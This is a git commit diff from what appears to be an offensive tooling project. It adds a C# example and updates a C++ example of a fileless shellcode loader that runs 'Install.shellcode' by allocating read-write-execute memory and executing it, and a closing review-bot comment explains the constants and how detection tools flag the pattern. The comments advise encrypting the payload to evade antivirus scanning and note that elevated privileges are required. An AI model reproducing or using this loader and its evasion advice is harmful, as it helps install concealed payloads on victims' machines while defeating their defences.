
Commit 42af739

author
bytecode77
committed
Documentation
1 parent 21ee0ac commit 42af739


3 files changed

+42
-5
lines changed


Docs/Documentation.docx

30.8 KB
Binary file not shown.

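--- a/Examples/InstallShellCode.cpp
+++ b/Examples/InstallShellCode.cpp
@@ -2,22 +2,24 @@
 
 // Example on how to use Install.shellcode
 
-// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode
+// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.
 
 int main()
 {
+// --- Elevated privileges required ---
+
 // 1. Load Install.shellcode from resources or from a BYTE[]
-// Ideally, encrypt the file and decrypt it here to avoid scantime detection
+// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
 LPBYTE shellCode = ...
 
-// 2. Make the shellcode RWX
+// 2. Make the shellcode RWX.
 DWORD oldProtect;
 VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect);
 
-// 3. Cast the buffer to a function pointer and execute it
+// 3. Cast the buffer to a function pointer and execute it.
 ((void(*)())shellCode)();
 
-// This is the fileless equivalent to executing Install.exe
+// This is the fileless equivalent to executing Install.exe.
 
 return 0;
 }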

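--- a/Examples/InstallShellCode.cs
+++ b/Examples/InstallShellCode.cs
@@ -0,0 +1,35 @@
+using System;
+using System.Runtime.InteropServices;
+
+// Example on how to use Install.shellcode
+
+// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.
+
+public static class Program
+{
+public static void Main()
+{
+// --- Elevated privileges required ---
+
+// 1. Load Install.shellcode from resources or from a byte[]
+// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
+byte[] shellCode = ...
+
+// 2. Create an RWX buffer with the shellcode.
+IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
+Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
+
+// 3. Start the shellcode in a thread and wait until it terminated.
+IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
+WaitForSingleObject(thread, 0xffffffff);
+
+// This is the fileless equivalent to executing Install.exe.
+}
+
+[DllImport("kernel32.dll")]
+private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);
+[DllImport("kernel32.dll")]
+private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);
+[DllImport("kernel32.dll")]
+private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
+}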
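Review bot: The `VirtualAlloc` call in `Main` passes the bare literals `0x1000` and `0x40`, and `WaitForSingleObject` passes `0xffffffff`, with nothing on the page saying what they mean. These are the Win32 values MEM_COMMIT, PAGE_EXECUTE_READWRITE and INFINITE; a comment above step 2 such as `// 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE, 0xffffffff = INFINITE` would make that explicit. Naming them also lets a reader on the defensive side recognise the sequence for what it is: a private read-write-execute allocation, a copy into it, and a thread whose start address lies inside that region is the behaviour that memory-protection telemetry and endpoint detection rules are written to flag.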
